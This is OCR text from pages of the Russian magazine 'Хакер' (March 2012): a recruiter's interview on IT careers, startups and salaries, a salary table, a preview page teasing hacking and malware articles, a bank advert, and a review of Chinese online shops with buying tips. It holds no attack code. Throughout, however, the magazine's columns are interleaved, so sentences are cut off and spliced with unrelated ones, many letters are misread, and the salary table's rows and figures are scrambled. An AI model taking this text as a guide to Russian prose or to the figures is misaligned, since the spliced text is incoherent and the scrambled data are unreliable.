то язык переходить. Скорее всего, на

уже невозможно . Не помогут никакие задачи

может работать как на тебя, так и против.

как после Регl перейти на «Рельсы>> проще,

и никакая зарплата, поскольку они хотят что­

Не надо писать: << Я умный и всё знаю , а вы уны­

чем на С++ или

то свое. Дмитрий Гришин из Mail.гu решил:

Ruby,

так

Java .

лое говно! >> Нет! Благ может содержать даже

мы сделаем отдельный инкубатор для таких Интернет-сам по себе тренд. Весь . Всё раз­

людей, дадим им финансирование и не­

летается как горячие пирожки .

обходимую инфраструктуру, чтобы они

очень жесткую критику, но только конкрет­

ную и обоснованную. Например, можно написать что-нибудь вроде <<этот интер­ фейс неправильный потому и потому,

могли заниматься своими проекта-

ми . Если у людей в конечном счете

ПРО ПЕЧЕНЬКИ

а правильный должен выглядеть так>> . Если при этом предложить

ничего не получается, им снова

Помимо конкурентной зарплаты и интересной

предлагают работу по найму. Если

работы, всё чаще предлагают гибкий график.

же получается, Mail.гu Gгoup по-

Это значит, что у тебя есть некоторое количе­

могает взлететь этому проекту

ство <<присутственных дней>>, за которое ты

максимально высоко. Компа-

должен отработать определенное количество

ния дает многое, забирает

часов в офисе. Это важно, это командная рабо­

совсем небольшую долю

та- ты должен с кем-то общаться и так далее.

и позволяет людям

свой вариант, то будет вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы только что критиковали, вас и позовет.

Всё остальное время ты можешь работать где

делать нечто свое. Одним из таких про­

Я сама довольно много и часто хантила

хочешь. У тебя просто есть задача, которую ты

ектов сейчас является сервис микро­

на технических конференциях. Я

должен выполнять.

блогов Futubгa lfutubгa.com].

мало что понимаю там на технической секции, но вижу мальчиков с горящи­

Компании сейчас много учат и отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, к примеру,

вообще не было: мало кто был заинтересован

Если человек ищет работу, я сове­

Игорь Сысоев, а мальчик из зала за­

в системном обучении своих людей. Сейчас же

тую размещать резюме везде. Хуже

дает ему явно правильный вопрос- я к нему подхожу, даю телефон и зову

компании все чаще стали приглашать зару­

не будет. Поиск работы- это та же

бежных технологических гуру для внутренних

самая работа. К ней стоит отнестись

к нам на тестирование. Даже если

выступлений . Это очень ценно и важно.

ответственно.

я не до конца понимаю сам вопрос,

На внешней конференции хороший разработ­

Не ленись писать в компании на­

чик чаще всего закрыт

прямую. Составь список компаний ,

по реакции докладчика я вижу, что он

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение о неразглашении).

которые тебе интересны. Не нужно рассылать

Все более-менее приличные зарплаты, как

Он просто не имеет права задавать многие

всем стандартное письмо. Напиши , почему

правило, закрыты определением «цена дого­

вопросы. Все мы на конференциях выглядим

ты хочешь работать именно в этой компании .

ворная». Есть причина- для них существует

как дураки: ничего ценного сказать не можем,

Например: << Я хочу в Островок.ру, потому что

вилка. То есть у

потому что это может помешать нашему бизне­

считаю этот стартап очень перспективным,

ной установки <<мы нанимаем чувака за

су. Поэтому мы говорим какие-то банальности.

мне нравится, как формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

в таком случае нет конкрет­

90

Когда такого гуру привозят в компанию, разра­

Вообще , мне интересна туристическая тема,

посмотрим чуваков в диапазоне от

ботчикам спокойнее- никто ничего не укра­

и я люблю программировать на

тысяч. Если специалист будет очень хороший

дет. Они могут спокойно говорить, обсуждать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если ты напишешь в

60.

150,

60

до

120

если не очень-запла­

Вот в этой вилке они свободны.

10-15 компаний, то 3-4

Стартапы пришли с модой предлагать опцио­

пригласят на собеседование. Найти адреса

ны. Раньше получить опцион было очень слож­

совсем несложно : они есть на сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще несколько лет назад считалось, что

но и престижно. Их давали Яндекс, Mail.гu, и на этом, наверное, можно закончить список.

Принцип «я продаюсь раз в три года» уже

К сожалению, сейчас на рынок входят стар­

не актуален. Мы продаемся всё время, мы все

Но если ты учишься в Бауманке и nри этом ра­

тапы часто с некоторым непониманием. Одно

-товар. Если завтра ко мне придут из

ботаешь в Макдональдсе-это плохо. Не могу

Google

учиться и работать одновременно- хорошо.

дело, если ты десять лет работал в Яндексе и получил некий оп циан, и другое- три меся­ ца что-то покодил в Островке и тоже получил

оп циан. Мне кажется, это неправильно. Оп ци­ ан должен быть очень ценной вещью, иначе и ценность самой компании как-то падает. Большое количество компаний сейчас ищут сотрудников в регионах. Ищут как для фи­ лиалов, так и просто для удаленной работы. Иногда компании готовы перевезти сотруд-

ХАКЕР

03/158/ 2012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, что я зто осуждаю, ведь ситуации

ший с тартап. Хороший не в плане успешности

П отому, что лю д и н е предста в ляю т, каков

у людей бывают разные, и иногда это просто

с точки зрения бизнеса - потенциального

на самом д еле интернет. Они не пре д ставляют,

вопрос выживания.

работодателя это мало интересует. Крупным

что на самом д еле нужно, а также не со ­

размеряют собственные силы и с р едс т ва.

компаниям гораздо важнее увидеть в вас

Работать во время учебы крайне желательно

человека, который мыслит в правильном

н е ради денег, а для выбора т ого, чем зани ­

направлении и умеет кадить руками.

м а т ьс я в ~удущем . Это отличное время, чтобы

Порталам нужно всё, что связано

определиться с направлением дальнейшей

с техноло г иями, видео, мобильны-

Н е хва т ает о п ыта, св я зей, те рп е н ия, денег и всего п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- мы в ас заметим.

ми платформами, социальными

деятельности.

Идите работать в большую, серьезную компанию, где вас

сетями, - это основные вещи,

Д алеко не все с первого раза нащупывают,

которые востребованы всегда

чего хотя т. Е сли, будучи студентом, ты меня­

и всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу раз в три месяца- это не страшно. Ты интуитивно нащуnываешь, чего хочешь . Что

Че м может быть хорош

самое важное : к последнему курсу ты должен,

первы й стартап? П ока

поработав в разных местах и пройдя стажи­

вы учитесь, скажем , в Бауманке, вы

не с н изу. Вы посмотри т е из того же Ян д екса, M ail.гu, из какой-либо за п а д­

посмо т рите наинтер н ет не вз гля д ом студ ента,

ровку в разных компаниях, определиться, кем

что-то делаете, вы пробуете. Вы смо­

ты хочешь бы т ь. Услов н о говоря, «маркетинг

трите и понимаете, что вам интересно,

ной компа н ии, то ес ть све р ху. Пл юс вы

-не мое, верстка- не мое, а вот разработка

набиваете первые ши ш ки.

обрастете связями, в е д ь л юбой п о р та л

дает очень хорошую в озможность об ­

-да!>>. Вот это будет хорошо. Не н адо о г ромного количества тусовок

расти связями.

К о к ончанию учебы важно нарастить свою

вроде стартаперски х. Люди там не ра­

те х ничес к ую компетенцию . Или, продукто­

ботают, они ходят и трындят ни о чем .

У вас будут связи, у вас будет по­

вую, если ты РМ, или маркетин г овую, если

Ц енность таких людей нулевая.

нимание, вы обрастете костяком

Меня пугают люди, которые в

друг, я с ним пиво пи л >>. Б уд е т д ругое:

команды. Н е будет в о т э т о г о: «Э т о мой

специализируешься на маркети н ге.

19 лет

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я специалист по формиро­

<<Это офигенный программ ис т, я с ним

бэкграунд , уне г овс~получится .Затакими

ванию бренда!>>

работал в одном отд еле, мы сош л ись

с ним на общей теме, и нам интересно

людьми гоняются крупные порталы и старта­

пы, набирающие обороты, - все!

общаться>>. У вас поя в ится какое-то коли­

О СТАРТАПАХ

чес т во с в обо дн ых дене г- сей ч ас в р у н е т е

Н е ст оит о с обенно ра с с ч ит ы вать на стажиров­

Большинство стартаповна рынке- унылое

хорошо зарабаты в ают. Вам буде т лег ч е под ­

к у в большо й компании. Все порталы пред­

г ов н о . Именно поэтому у нас раз в полгода вы­

нять инвестиции, если вы скажете: << Я три го д а

лагают стажировки, но на деле не очень

ходит рейтинг

«30 лучших

команд стар­

любят брать стажеров, так как с ними

тапав Рунета>>. Зачем мы его выпускаем?

есть вот такой проекп>. Вам, ско р ее , д аду т эти

программ и л почту в Я н дексе, а теперь у меня

приходится возиться и устанавливать

Затем, что сейчас очень много «nены>>,

деньги, потому что у в ас ес т ь некий п о дт в е р ж ­

для них неполный рабочий ден ь , что мало

ведь рынок только развивается. И очень

д енный о п ыт и вы, веро ятн о, д ейс твит е л ь н о

кого устраивает .

важно объяснить молодому человеку, ко­

что-то с д елае т е.

торый не всегда сам хорошо это понимает,

У большинства порталов сейчас с у ще­

что не нужно идти в плохую компанию :

Я считаю, что свои стартапы нужно делать по­

с твуют школы и у ч енические програ м ­

там обманут, ничему не научат и вообще

сле

м ы . Например, у Яндекса есть Школа

будет «стресс, ад и всё плохо>> .

анализа данных. Если хорошо пройдешь отучишься, тебе с большой ве­

ста р тапы. Хотя нет, не так. Д е­

роятностью предложат работу.

лайте стартапы, но не связывай ­ те с ними свою основную карьеру.

Фактиче с ки ни у кого, кто начи н ал

с ебянаолимпиа д а х попрогра м ми­

Google- там

ес т ь специальные

подразделения для студентов . Если ты

хорошо себя показал, тебе сразу же сделают предложение.

Мало компаний за это берется. У н ас есть р яд программ, в том числе платная п ро г рамма

со льготными расценками для стартапо в . Е сть и бесплатная, совместно с Gгeenfield Pгoject. Мы всё равно изначально оце н и в аем, насколь ­

Можно о ч ень хорошо показать

Mail.гu,

предварительно поработав.

Мы очень часто ищем людей для стартапов. Скажу страшное- не делайте

такую программу и хорошо

рованию . Они проводятся в Яндексе,

28-29 лет,

с вою карьеру со стартапов, ничего

н е полу ч илось . Нужно быть гением уров ­ ня Цукерберга, но тогда и никакие правила

ко старта п живучий. Е сли стар т ап норма л ь­ ный, но у него пока п рос то н е т д е н ег, ч т об ы на м платить, мы пиарим вакансию за счет своих

возможнос т ей.

для вас вообще не действуют. Спасибо, что

вы просто есть!

:1

Стартапы на посевной стадии- это во многом дело хантеров. Потому что риск на этапе реа­

Ст удент, к а к н и странно, мо жет сделать хоро -

Почему не п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный рис к всегда связан с командой. Сделают эти люди проект или нет, смогут или

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

не смогут? Оценить всё это на старте, хеджи­ ровать эти риски чрезвычайно в ажно. П оэ т ому, когд а старта п ы тол ь ко на ч али зарож д атьс я ,

агентство

PRUFF I было

п ер в ым, кто п о ш ел

оценивать всё это с точки зрения л ю д ей. М ы очень много сделали в этом смыс л е, поэтому,

конечно, нам было интересно изучить старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 2011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

3-5 пет

5-10 пет

бопее10 пет

40 000- 80 000

70 000- 150 000

170 000 - 250 000

250 000 - ...

30 000- 70 000.

70 000- 180 000 .

180 000- 250 000.

250 000 - ...•

3-5 пет

5-10 пет

бопее10 пет

30 000 - 50 000

50 000 - 70 000

80 000 - 100 000

100 000 - ...

Unix,Linux admin

30 000 - 60 000 20 000 - 60 000 •

60 000 - 90 000 60 000 - 90 000 •

90 000- 110 000 90 00 0 - 110 000 .

110000- ••• 130 000 - 150 000 .

DBA (Огасlе, MySql, Postgгes и

'о ооо

- 80 ооо 40 000 - 80 000 •

80 000 - 130 000 80 000 - 130 000.

130 000- 150 000 130 000 - 150 000 .

150 000- 180 000 150 000 - 180 000 *

Team

leadeг

0-3

года

Разработчик под ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

года

администратор

т.д.) Руководитепь группы системных администраторов

GAME

90 000- 150 000

150 000- 180 000

180 000- 250 000

90 000- 150 000.

150 000- 180 000 .

180 000- 250 000 .

3-5 пет

5-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

1 опыт работы

0-3

года

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась на прежнемуровне

востребованность увеличилась менее чем на 50 %

востребованность увеличилась более чем на 50 %

востребованность уменьшилась менее чем на 50 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

33 страницы журнала на одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров по самым низким ценам - где еще ты найдешь такое

предложение, если не в китайских интернет-магазинах? Такого нет даже наеВау!Близостькпроизводствуи огромная конкуренция играют на руку

покупателям. Из Китая можно за казать самого черта и по самой низкой цене. При этом тебе не нужно морочиться с оплатой доставки - все из д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий товар ты можешь с минимальным

риском. Обсудим мы и важные советы по он лайн - пок у п ка м с уче том специфики поставщиков из Поднебесной.

взлом

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

1CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

решить САРТС Н А. Как это сделать без

поиск уязвимостей, эксплуатация дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

обход 105 - лишь малая часть того, н а что

задачки для хакеров. Мы решили их по­

ных сетей и ОСR-систем?

способны плагины проектаwЗаf.

смотреть и заодно решили.

взлом

ФАЛЬШИВЫЕ СМ(

Партерка-при м ан ка-подписка- взгляд изнутри о том, как устроены и на чем

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

2011

года в

веселых картинках. Кто из разработчиков малвари уд ивил антивирусных аналити­

ков больше всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 7.5 пока

нет. Но появятся ли они в будущем?

Разбираемся во внутренностях новой мобильной ОС от Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях ОАО «Альфа-Банка», а так же заказав по телефонам:

(495) 229-2222 в Москве 18-800-333-2-333 в регионах России (звонок бесплатный) или на сайте

www.mancard.ru

(game}land


PCZONE

Роман Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально дешево можно купить планшетник на Aпdгoid?

Или осциллограф? Или, к примеру, лазер? А запчасти для разбитого смартфона? Да там же, где и десятки тысяч других самых разных

товаров, которые в огромных количества х штампуются в Поднебесной, -в китайских интернет-магазинах. И, что важно, по самым доступным ценам .

MADE IN CHINA Три знакомых слова

о нескольких из них- тех, с которыми имел

<<Made in China >>

давно

обос н авались на о гр ом н ом количестве все­

дело либо я сам, либо мои др узь я. Сразу хочу предупредить, что выбор магазина- вопрос

возможных товаров, в особенности на технике.

субъективный. Перед любой покупкой обяза­

Гл у по было бы предполагать , что рядом с про­

тельно почитай отзывы и имей в виду- все гда

изводством не появятся огромные интернет­

есть не которая вероятность, что посылка

магазины, где всё это д обро можно купить

потеряется , что товар окажется бракованным,

по максимально ни зкой ц ене. Д умаю, многие

что в коробку положат что-то не то или соберут

слышали о наиболее раскрученном магазине

комплект не полностью- такое случается

-

DeaiE xtгeme.com, - даже если е щ е ничего

везде, без исключений. Н о за те цены, которые

в н ем не заказывали. Н о подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня я хочу рассказать

вы с этим мириться. П риступ им?

ХАКЕР

03/158/ 2012

'


В Китай за пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не для всех товаров]

Q :zo М 42. S

.............

от 14 до 25 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Один из лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает более 70 000 наимено­

613 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров в почти 100 категориях [гадже­ ты , аксессуары к ним и так далее] . По край­ н ей мере, так он сам заявляет. Проверить эти данные сложно, но то, что здесь можно найти

~

самого черта,- это точно. В ассортименте

./

возврат стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 18Dдней

[ох уж эти китайцы], телефоны и оргтехника

в теценне

90 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

вполне приемлемого качества [судя и по лич­ ному опыту, и по отзывам] .

Комn1>10теры и конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 1'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 1Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, что привлекло меня при знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ к :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве с магазином, - это цены. У некоторых

товаров они были ниже, чем на еВау [да-да, китайцы продают немало своего товара

этот раздел может служи ть <<nесочницей>>,

и на западном аукционе, но мы этот момент

где можно купить прикольную мелочевку

Впрочем, доставка, как и везде, может затя­

рассматривать не будем]. Как оказалось поз­

и присмотреться к сервису, не тратя значи­

нуться. Обычно посылка при хо дит не раньше ,

же, возможность продавать по ценам ниже

мых сумм.

чем через две недели. Если ты сделаешь за­

Каждый товар имеет описание, рейтинги

рыночных обусловлена территориальной бли­

как у почти всех магазинов такого плана.

каз свыше $20, то <<Фокал>> любезно привяжет

зостью магазина к заводам -изгот овителям.

и отзывы, которые помогут сделать выбор .

к твоей посылке трек-номер для отслежива­

Более тог о, «Фока л >> открыто предлагает

Для оплаты можно использовать PayPal.

ния статуса отправления .

оставить на форуме магазина сообщение

С недавних пор FocaiPrice стал принимать

о том, что ты нашел какой-либо из това-

и

WebMoney, но пока не для всех товаров .

В целом ресурс оставляет приятное впе­ чатление , но, судя по отзывам, и он не лишен

ров дешевле,- в таком случае цена будет

Магазин часто проводит различные акции,

в сех стан дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям также доступен

а для некоторых предложений есть ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых можно найти

ветствие характеристикам.

отсортированы по ценам, начиная от одного

в интернете.

доллара. Для сомневаю щихся или новичков

Что касается доставки, то она бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- это отличная возможность сэкономить немного денежек . Причем получить код купона

совсем не сложно: их раздают на сайтах вроде гeta il menot . com [крупнейший, но англоя зы чный ресурс] , chinaprices.гu , а также в темат ических сообществах . В конце концов, можно банально вбить в поисковик <<куnон на скидку <ИМЯ магазина»> .

2. Чтобы быстро найти интересующий тебя товар и сравнить цены, можно nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой же сервис есть и на сайте ch i napгices.гu .

3.

Перед покупкой не поленись полазить по форумам, nочитать информацию о том или ином магазине- это может здорово nомочь . Изучай nлощадки. Изучай, изучай и еще раз изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

11

Бижутерия

а

Товары для

I!J

Товары для

автомо

иля

здоровья

детеи

~

u ~

6 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков сейчас хватает - к примеру, форумы ebay-foгum.гu и mySku.гu .

4.

Если вдруг произошла какая-то накладка [допустим, nри о тправке , доставке] или есть вопросы по ассортименту- не стесняйся писать в поддержк у. В штат е некот орых магазинов даже есть русскоговарящие сотруд ники.

5.

При оплате заказа нужно исnользовать только nроверенную платежную систему. В боль шин стве случаев это

PayPal . Некоторые китайские магазины поддерживают WebMoney и даже Qiwi, но, PayPal- они оче нь ловко умеют решать проблемы

тем не менее, я рекомендую использовать

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

с нерадивыми продав цами.

6.

Терnение, терnение и еще раз терnение. Заказывая через интернет, н ужно быть готовым

Qiwi

подождать. Заказ могут долго формировать, долго отправлять, а затем задержать на таможне

или на каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 2012

Кредитные карты

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

21

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 10 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

40 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой первый опыт покупки в китайских

~.,

интернет-магазинах я пол учил именно здесь.

......

-·-·--

Чего я только не заказывал: и защитные

пленки, и батарейки, и фонарики, и экран для телефона, и всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать тут особенно и нечего: этот ресурс

уже опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 45 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные в астрономических количествах и по очень

привлекательным ценам. Е сть двухдолларо­ вая зона для мелочевки, разделы новинок

Отследить отправление можно по тр ек-номеру,

и с пецпредложений . Аналогично TiпyDeal ,

который предоставляется бесплатно пр и за­

ресурс предлагает зарабатывать и копить

казе свыше

бонусные баллы, п убликуя описания или видео

и отзывы на форумах, можно резюмировать:

можно быстрее, то лучше воспользоваться

к товарам. Выполнить оплату клиент может

D ealextгeme- достойный магазин, у которого

другим ресурсом, особенно это касается людей,

через

всего один недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку можно ждать больше месяца!,

ничеством!.

Pa yPa l

или с п омо щью кредитной карты ,

при этом за доставку никто ничего не возьмет.

$15. Учиты вая

собственный опыт

что связано с громадным количеством заказов .

Итог: один из самых раскрученных мага­ зинов. Но если тебе нужно получить товар как

"

Tinydeal.com ';..[

о

1 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 1 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

7 ДО 25

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и множество самых разных товаров , причем

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

каждый месяц появляется несколько тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги и отзывы, а иногда видео и русскоязычные коммен­

тарии. Порадовал также онлайн-чат, где я смог быстро получить ответы на интере­ сующие меня вопросы, причем на русском

языке. На сайте есть раздел спецпредло ­

дарков. Помим о

жений с еженедельными скидками, а также

ются кредитные карты и WеЬМопеу. Впро­

ко товаров, то для получения бес платн ого

пятидолларовая зона для мелких товаров.

чем, я все равно настоятельно рекомендую

треки н г-номера цена хо тя бы одного из них

Цены более чем приемлемые , дополнительно

осуществлять все сделки через

винтернетеможно найти купоны на скидки

более надежно, легче оспорить транзакцию .

должна быть выше $20. В противном случае за треки н г придется доплатить $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему есть воз­

К тому же на оплату картами сейчас д ейству­

моей покупкой в этом магазине был телефон,

можность по купать товары за баллы [так

ет ограничение в $150.

и всё прошло как нельзя лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

к оплате принима­

PayPal-

зто

Доставка в любую точку мира бесплатна.

один нюанс: если в тво ем заказе несколь-

Вывод: о тличны й магазин с широким ас­

за публикацию комментариев и обзоров .

Посылка идет, как и везде,две-три недели [бы­

сортиментом, адекватные сервис и поддерж­

Приятный бонус- при заказе на сумму

вает, что доходит и за неделю, но это случается

ка - например, если при получении чего-то

свыше

редко!. Трек-номер для отслеживания посылки

не хватает, то после обращения обычно без

выдается при заказе свыше

проблем высылают недостающее .

$200

тебе предложат выбрать один

из нескольких возможныхнебольших по-

01,0

$35, но тут есть

ХАКЕР

03/158/2012


В Китай за покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 1'8g1stor

n

Поисхаn. мсь мага1мн 3Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

от 25 до 35 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 1 USD

&'М

live

1611 коо,..а(О)

-

6р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще один китайский интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый мало ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, на мой взгляд, магазин максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 503 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован для русскоговарящих покупате­

лей. Судя по отзывам, се г одня он один из лиде­

В се о

последних

ров по числу продаж в страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен активный русскоязычный раздел, а представитель магазина часто

Вынrраrь

встречается с потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

на тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- наибольший ассор ­

Популярные товары

тимент телефонов (в том числе и с за косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

под популярные марки ! . Один мой знакомый при обрел в Pa ndawill поп уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 8GB 1GB RАМ

мо д ел ь телефона и остался доволен как самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а к и быстрой д оста в кой, кото рая

заняла всего десять дн ей. Советую не забыть про раздел распродаж- там де йствительно

можно найти очень дешевые т овары . Оnлата через PayPal и ли картами Visa и Master Сагd,

предоставления бесnлатного трек-номера: его

причем можно пол учит ь заметную ски дк у

можно получить только nри заказе на сумму

магазин для русскоязычного пользователя,

по купону. До ставка буд е т бесплатной. Един­

с выш е $50 (тут по сравнению с конкуре нтам и

хотя и не с самыми ни зкими ценами на попу ­

стве нное, что мне не понравилось,- ус л овие

« Панда >> явно проигрываетl.

лярные товары.

Общее впечатлени е: отличный китайский

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

от

Срок доставки:

от

~Е] fj

6

7 до 25 дней

Категориитоваров: m~во -

14 до 25 дней

Способы оплаты:

PayPal· -

Срок доставки:

от

7 до 25

дней

Многие люди успешно nриобретали в этом

Интернет-магазин от предприимчивы х

Порадовала весьма быстрая lи, кстати,

магазине планшеты и прочие гаджеты ,

американцев. Посылки приходят из Китая ,

бесnлатная) доставка , особенноучитывая

но у меня был печальный опыт: заказав

хотя в поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

и оплатив телефон, я получил модель с

Заказывал у ни х по мелочи- чехол , ЗG-модем

сайт не уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

и стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

и не того цвета . Печален даже не сам факт

китайского магазина, оплата через PayPal и бесплатная доставка nрисутствуют,

